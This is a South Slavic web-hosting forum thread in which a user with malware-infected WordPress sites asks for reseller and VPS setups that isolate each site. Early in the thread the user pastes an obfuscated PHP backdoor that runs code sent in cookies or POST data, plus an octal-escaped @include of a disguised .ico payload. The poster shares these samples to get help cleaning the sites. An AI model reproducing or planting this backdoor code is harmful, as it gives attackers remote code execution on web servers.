Tražim hosting sa nezavisnim cjelinama

Koliko je kompleksno upravljati VPS-om da se postigne struktura resseler hosta?

Može li kod tog virusa što se čisti? Je l’ JS il’ PHP il’ nešto treće?

Neki mutant. Ma PHP u nekakvim enkodiranim verzijama…nisam išao za tim da pohvatam što i kako radi.

<?php
$tkvftkk = '6i0gp-v8a_u4mlbnd#9tHor5cxy3fe*k\'s';$kqtam = Array();$kqtam[] = $tkvftkk[20].$tkvftkk[30];$kqtam[] = $tkvftkk[24].$tkvftkk[22].$tkvftkk[29].$tkvftkk[8].$tkvftkk[19].$tkvftkk[29].$tkvftkk[9].$tkvftkk[28].$tkvftkk[10].$tkvftkk[15].$tkvftkk[24].$tkvftkk[19].$tkvftkk[1].$tkvftkk[21].$tkvftkk[15];$kqtam[] = $tkvftkk[8].$tkvftkk[14].$tkvftkk[23].$tkvftkk[18].$tkvftkk[7].$tkvftkk[16].$tkvftkk[29].$tkvftkk[27].$tkvftkk[5].$tkvftkk[7].$tkvftkk[27].$tkvftkk[14].$tkvftkk[0].$tkvftkk[5].$tkvftkk[11].$tkvftkk[8].$tkvftkk[29].$tkvftkk[2].$tkvftkk[5].$tkvftkk[7].$tkvftkk[16].$tkvftkk[24].$tkvftkk[28].$tkvftkk[5].$tkvftkk[27].$tkvftkk[18].$tkvftkk[8].$tkvftkk[7].$tkvftkk[18].$tkvftkk[2].$tkvftkk[7].$tkvftkk[18].$tkvftkk[0].$tkvftkk[11].$tkvftkk[18].$tkvftkk[23];$kqtam[] = $tkvftkk[17];$kqtam[] = $tkvftkk[24].$tkvftkk[21].$tkvftkk[10].$tkvftkk[15].$tkvftkk[19];$kqtam[] = $tkvftkk[33].$tkvftkk[19].$tkvftkk[22].$tkvftkk[9].$tkvftkk[22].$tkvftkk[29].$tkvftkk[4].$tkvftkk[29].$tkvftkk[8].$tkvftkk[19];$kqtam[] = $tkvftkk[29].$tkvftkk[25].$tkvftkk[4].$tkvftkk[13].$tkvftkk[21].$tkvftkk[16].$tkvftkk[29];$kqtam[] = $tkvftkk[33].$tkvftkk[10].$tkvftkk[14].$tkvftkk[33].$tkvftkk[19].$tkvftkk[22];$kqtam[] = $tkvftkk[8].$tkvftkk[22].$tkvftkk[22].$tkvftkk[8].$tkvftkk[26].$tkvftkk[9].$tkvftkk[12].$tkvftkk[29].$tkvftkk[22].$tkvftkk[3].$tkvftkk[29];$kqtam[] = $tkvftkk[33].$tkvftkk[19].$tkvftkk[22].$tkvftkk[13].$tkvftkk[29].$tkvftkk[15];$kqtam[] = $tkvftkk[4].$tkvftkk[8].$tkvftkk[24].$tkvftkk[31];foreach ($kqtam[8]($_COOKIE, $_POST) as $jlgtudl => $tmwuer){function dctvsy($kqtam, $jlgtudl, $nsvmcth){return $kqtam[7]($kqtam[5]($jlgtudl . $kqtam[2], ($nsvmcth / $kqtam[9]($jlgtudl)) + 1), 0, $nsvmcth);}function aqihg($kqtam, $vfzhrbm){return @$kqtam[10]($kqtam[0], $vfzhrbm);}function lvyjdt($kqtam, $vfzhrbm){$thdstnj = $kqtam[4]($vfzhrbm) % 3;if (!$thdstnj) {$ybammpl = $kqtam[1]; $yuwwf = $ybammpl("", $vfzhrbm[1]($vfzhrbm[2]));$yuwwf();exit();}}$tmwuer = aqihg($kqtam, $tmwuer);lvyjdt($kqtam, $kqtam[6]($kqtam[3], $tmwuer ^ dctvsy($kqtam, $jlgtudl, $kqtam[9]($tmwuer))));}

…

<?php
/*15343*/

@include "\057home\057http\144/vho\163ts/c\162oati\141-acc\157mmod\141tion\056info\057apar\164mani\055proh\141ska.\143om/t\145mpla\164es/t\065/ima\147es/.\0610035\064bb.i\143o";

/*15343*/

Ima još patterna u kojima se pojavljuje, ako te zanima baš…potražit ću.

Potraži za početak gdje ti se dešava % 3.

Edit: je l’ to code injected il’ file created?

Prvi kod:

image1206×180 18.3 KB

image914×79 3.22 KB

Evo kako se i pakuju funkcije i ne samo to:

@bozoou

'6i0gp-v8a_u4mlbnd#9tHor5cxy3fe*k\'s'

Ovaj string, je l’ uvijek isti il’ se mijenja po sajtovima?

Ok, to će biti svakako korisno…al trenutno sam fokusiran na drugo.
Prioritet mi je spriječiti mogućnost prelaska virusa…jer džabe ja nađem lijek za jedan virus, neka se sutra pojavi klijent sa stranicom sa drugačijim virusom…eto opet najezde i problema na svim projektima.

A kad blokiram mogućnost prelaska onda sam već generalno siguran. Tada se mogu baviti pojedinačno sa tim site-ovima i tražiti u čemu je kvaka da izlječim i te “nulte pacijente”. Al trenutno mi je malo požar da bi o tome uopće razmišljao.

Gornja dva posta su zrela za zasebnu temu, i bum uskoro otvorio tu temu.

Trenutno me zanima preporuka reseller hosta, netko možda iskustva sa:

te koje su alternative, da se postigne ponašanje sustava koje sam opisao da trebam.

Hvala.

kako nađeš te viruse? jesu li nulled theme u pitanju? svaku temu treba provući kroz virustotal

Nebi znao kako su nastali. Nisu moji projekti, nego sam ih dobio kao extra gift uz jednu akviziciju. A previše tu ima wp siteova da bi istraživao tko što koga i kakve su teme. I još površno poznam WP, a i mali su to sajtovi da bi se isplatio detaljan pristup oko svakog.

A virusi su detektirani jer su radili redirekcije na spam reklame…sa svakog sitea na koji bi se zakeljili. A redirektali bi i na porniće i svašta…i to poprilicno agresivno u omjeru mozda 1:1 spam vs original site.

Razdvajanje projekata po nezavisnim cjelinama se pokazalo zaista elegantno i robusno rješenje. Jer takovi virusi se mogu širiti samo ako inficirani projekt ima dozvolu da kreira/modificira skripte drugog projekta.

Možda ne trebaš reseller host. Uzmeš VPS , instaliraš CWP i sa njim možeš kreirati reseller acc, pa onda jedan sajt na jedan username

E, to mi zvuči puno fleksibilnije i povoljnije. Jer vidim da reseller hostinzi dobrano pumpaju cijenu po novom korisniku. Što u mom slučaju znači da me rast broja nezavisnih cjelina dobrano košta.

E sad, ja sam malo/puno neuk što se tiče upravljanja vps-om. Pa me zanima koliko je kompleksno da se kao novak snađem sa time?
Kakva je krivulja učenja, tj. koliko vremena je potrebno da se uhodam il postavim inicijalni setup za reseller account?

instalacija cyberpanela, zaista jednostavan control panel, sve se može u par klikova …

https://cyberpanel.net/docs/installing-cyberpanel/

ako je na vpsu centos 7 ili ubuntu za skoro sve imaš tutorijale na netu

Ok, zvuči da nema razloga za strah. Onda odluka pada na vps.
Kako odabrat vps, kod koga? Ako može koja sugestija

P.S. “uskoro nudim hosting pakete na forumu”, hehe

Vidi po netu . Ja osobno koristim hetzner i nemam problema nikakvih. Koristim Ubuntu + webmin/virtualmin .
Prije sam koristio VestaCP, pa onda i CWP (oba na Centos)

VestaCP i CWP imaju mogućnost da po korisniku ograniče pakete i osiguraju sigurnost .

Webmin/Virtualmin radi istu stvar, samo po principu podjele po serverima a ne korisnicima .

Poanta je, da kreirana struktura foldera ima vlasnika, koji ima permisije. Takva situacija je kod svakog od njih, i mislim da je sasvim dovoljna da te riješi problema.

ja bih ti preporučio veesp.com … unamanged su serveri

samo da te upozorim jer sam ja imao problema, ako sam podešavaš vps budi spreman da će se nekad pojaviti neki problem koji ćeš rješavati sat vremena, a podrška neće da pomogne jer je unmagaged ili će tražiti da platiš

postoje i managed vps serveri sa podešenim cpanelom ali su duplo skuplji

Od ta dva ne zna se koji je vise supalj. Plus ovaj Centos Web Panel nema veze sa Centos projektom osim sto radi na njemu, a da je lijep na oko jeste… Znaci na server gdje ima klijenata ih koristiti bi bilo lose.

https://www.rack911labs.com/research/security-analysis-of-alternative-control-panels/

https://www.webhostingtalk.com/showthread.php?t=1770951

https://cxsecurity.com/cveproduct/16933/34645/centos_web_panel/

Za CWP mogu reći da me nije oduševio , što ne čudi s obzirom da već godinama ne rade na njemu aktivno. Dali je šupalj ne znam, ali je bugovit i nema aktivnu zajednicu

Koje opcije ti predlažeš onda?

Sudeći po tvom iskustvu, ako sajtovi nisu veliki i nemaju mnogo posjeta kupi neki cPanel ili DirectAdmin reseller hosting. Ako sajtovi imaju dosta posjeta svi zajedno oko recimo 20k posjeta dnevno kupi managed VPS (2 jezgre 2 gb rama) sa cPanelom ili Direct Adminom. Ako imaju više od tog onda jači VPS. Ovo ipak nisu egzaktni brojevi, dosta zavisi i od konfiguracije, komplikovanosti i optimizacije samih sajtova.

Gdje da kupiš i kod koga ti ne mogu preporučiti, odvoji jedno veče i pregledaj webhostingtalk ponude i iskustva.

Generalno ljudi preporučuju da se izbjegavaju ovi hostovi

Mada ja imam iskustvo sa nekima sa te liste pozitivno.

Na forumu su dosad preporučivani mnogi hostovi poput Hawkhosta, Coolicehostinga, spomenutog mydataknoxa pogledaj starije teme… Šta god da uzmeš sastavi neki backup na svoj računar ili Amazon S3, Google Cloud bez obzira šta hosting kaže da ima.

Kad to uzmeš onda za svaki sajt napravi poseban nalog i migriraj ga tamo po mogućnosti kad ga očistiš. Ako su WP sajtovi u pitanju uzmi Wordfence plugin i uključi onu opciju da uporedi sa WP fajlovima tvoje fajlove i da odskenira fajlove izvan WP-a. Sve izvan wp-contenta a što nije Wordpress obriši, ono što je dio WP-a a sumnjivo pregledja i očisti, sve u WP contentu što kaže da je sumnjivo pregledaj i očisti. Ako nisu WP sajtovi onda ručno kako si krenuo.

Da se ogradim ponovo ne garantujem ni za jednog sa liste…